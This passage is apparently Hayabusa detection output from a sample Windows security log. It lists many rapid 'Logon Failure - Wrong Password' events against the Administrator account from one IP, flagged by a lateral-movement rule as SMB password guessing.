NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AUeUmYa72BzHfyhK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ksydur7W1mUoOZAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YNIzopnsXH6OjcUs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SQljJkaWs8bcaOI1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1jejn6ZMo564m7ok : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KrpBO1SCHpt27CRM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ifPePsozBYRLCU3k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vve4r8QwaMLKrrcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9ArElR5k8yLefWu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a1Y126C516BaGcz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VL7PnrO2dLsEbebQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GGTlLZ8J9f2PtiuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6sVwPFs7bhJgJwRt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dgQNHL9etdHdRw9Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mjZrWpJlN2CwbxFc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 72lmrp6neWGKAURB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CnTi5dgoWunYutJ9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi2fTl07llsJEYyt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:16.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hohh8KS1eYtojEya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.020 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RsuC8F95UmsOSKvs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: be8UJ0EN7XS5r0b6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CgJlVYanwWKAhJ7O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zthqCIkr1nKtqcCj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tzmi8I402j71q5Wg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m0U3NYl8QEbgeJry : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uJJ1FOUIBInGkKPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bu0X5RisszAHEs0X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5ZZfs8zqT2bLOAHq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkpO31LzJfaYLyjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJrIsRTWUwPuySR7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.503 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VHNccqtwl9Y9IhLq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: APlvDcMzvms0gehT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxOERGKI75RarVNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uvzwd5qqC7og49yW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lksm3o2g0YhFnm4Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zwXhSPCV4qHVF9Rc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z31baZ4G36idFMeX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK63qylKunHZB3zS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: 